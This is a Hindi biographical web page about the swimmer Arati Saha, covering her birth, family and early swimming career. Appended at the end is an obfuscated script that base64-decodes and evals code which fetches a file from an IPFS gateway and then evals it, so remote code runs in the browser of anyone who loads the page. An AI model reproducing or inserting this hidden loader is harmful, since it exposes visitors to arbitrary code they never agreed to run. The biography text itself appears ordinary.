आरती साहा का परिचय
आरती साहा का परिचय
| |
पूरा नाम | आरती साहा गुप्ता |
जन्म | 24 सितम्बर, 1940 |
जन्म भूमि | कोलकाता |
मृत्यु | 23 अगस्त, 1994 |
मृत्यु स्थान | कोलकाता, पश्चिम बंगाल |
अभिभावक | पिता- पंचुगोपाल साहा |
कर्म भूमि | भारत |
खेल-क्षेत्र | तैराकी |
पुरस्कार-उपाधि | 'पद्मश्री' (1960) |
प्रसिद्धि | तैराक |
नागरिकता | भारतीय |
संबंधित लेख | मिहिर सेन |
अन्य जानकारी | आरती साहा ने ही डॉली नजीर का रिकॉर्ड भी तोड़ने का कारनामा किया था। उन्होंने 1951 में बंगाल स्टेट मीट में 100 मीटर ब्रेस्टस्ट्रोक में डॉली नजीर का रिकॉर्ड तोड़ते हुए 37.6 सेकंड का समय लिया था। |
आरती साहा का जन्म 24 सितम्बर, सन 1940 को कोलकाता, पश्चिम बंगाल में हुआ था। उनका सम्बंध एक साधारण बंगाली हिन्दू परिवार से था। उनका पूरा नाम आरती साहा गुप्ता है। उनके पिता का नाम पंचुगोपाल साहा था। आरती अपने पिता की तीन संतानों में दूसरी और दो बहनों में बड़ी थीं। उनके पिता सशस्त्र बल में एक साधारण कर्मचारी थे। जब आरती ढाई साल की थीं, तभी उनकी माता का देहान्त हो गया। उनके बड़े भाई छोटी बहन भारती को मामा के यहाँ रखा गया, जबकि आरती अपनी दादी के पास रहीं।
तैराकी की शुरुआत
जब आरती साहा चार वर्ष की थीं, वह अपने चाचा के साथ चंपताला घाट पर नहाने के लिए जाया करती थीं जहाँ उन्होंने तैरना सीख लिया था। जब उनके पिता ने देखा कि आरती की दिलचस्पी तैरने में है तो उन्होंने अपनी बेटी को हटखोला स्वीमिंग क्लब में भर्ती करा दिया। सन 1946 में मात्र पाँच वर्ष की आयु में आरती साहा ने शैलेन्द्र मेमोरियल स्वीमिंग प्रतियोगिता में स्वर्ण पदक जीता। यह उनके तैराकी कॅरियर की शुरुआत थी।
|
|
|
|
|
टीका टिप्पणी और संदर्भ
बाहरी कड़ियाँ
- क्या आप जानते है देश की जलपरी आरती साहा को
- आरती साहा इंग्लिश चैनल को पार करने वाली प्रथम एशियाई
- 63 साल पहले इंग्लिश चैनल पार करने वाली पहली एशियाई बनीं थी आरती
संबंधित लेख
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>